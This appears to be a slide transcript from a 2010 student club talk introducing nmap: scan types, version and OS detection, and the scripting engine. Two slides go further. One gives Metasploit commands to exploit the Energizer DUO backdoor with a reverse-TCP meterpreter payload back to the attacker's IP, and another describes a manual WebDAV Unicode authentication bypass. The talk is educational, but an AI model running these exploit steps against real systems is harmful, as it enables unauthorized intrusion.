4/13/2010. css meeting stephen crane on programming contests tomorrow @ 1pm building 8 room 345...
TRANSCRIPT
CBARN! Buy your tickets today!▪ $30
Great food! Learn more about other clubs and the
College of Business This Friday @ 7pm
05/11/10
Idle:-sI Zombie scanning Scans a machine using another As far as the scanned machine knows,
our computer never communicated with it
Only located ports, no version info Doesn’t spoof mac address
05/11/10
Advanced Features
Version information (-sV) Attempts to identify the version of the
discovered service Can make mistakes
OS Detection (-O) More or less accurate Can make mistakes
Advanced Features
Verbosity (-v[vv]) Gives more info Very useful grep is your friend
Runtime interaction v/V: Adjust verbosity Spacebar: Print status message
Scripting engine Custom written scans Vulnerability scanning & exploitation
(kinda)Written in LUA
05/11/10
Two types: Service scripts Host scripts
Nine categories Auth Default Discovery External Intrusive Malware Safe Version Vuln
05/11/10
Scripts location: /usr/share/nmap/scripts /usr/local/share/nmap/scripts C:\Program Files\Nmap\scripts
nmap –script-updatedbCommand format:
nmap --script=<script_name> target
05/11/10
Energizer Trojan Script
A backdoor was found in the Energizer Charger program
Might have been a mistake We don't really care
Listens on port 7777 of the infected machine
Detection is now built-in to version scan nmap -sV -p7777 target
Energizer Trojan Script
Metasploit! Metasploit has a module that will exploit the
trojan
> use exploit/windows/backdoor/energizer_duo_payload
> set rhost target.ip> set payload windows/meterpreter/reverse_tcp> set lhost your.ip> exploit
IIS WebDAV script
WebDAV allows users on a website to modify files on the webserver A vulnerability was found in IIS 6.0
WebDAV implementation Allows remote authentication bypass
due to a parsing error of UNICODE characters
Nmap has a script!
IIS WebDAV script
The script can identify vulnerable files on the webserver
nmap --script http-iis-webdav-vuln.nse target
IIS WebDAV script
Let's exploit it manually The vulnerable server improperly parses
the UNICODE character '/' (0xc0 0xaf) We'll use telnet to exploit
Extra Stuff
“default” script scan (-sC) Scans using a bunch of different scripts Very noisy, very intrusive Gives you a lot of info
“Aggressive” scan (-A) Uses -O -sV -sC --traceroute Again, very noisy But lots and lots of info
Closing remarks
nmap is a tool you should be familiar with
There are many more techniques and scans that I did not cover
Be mindful of who you are scanning (and any laws regarding scans)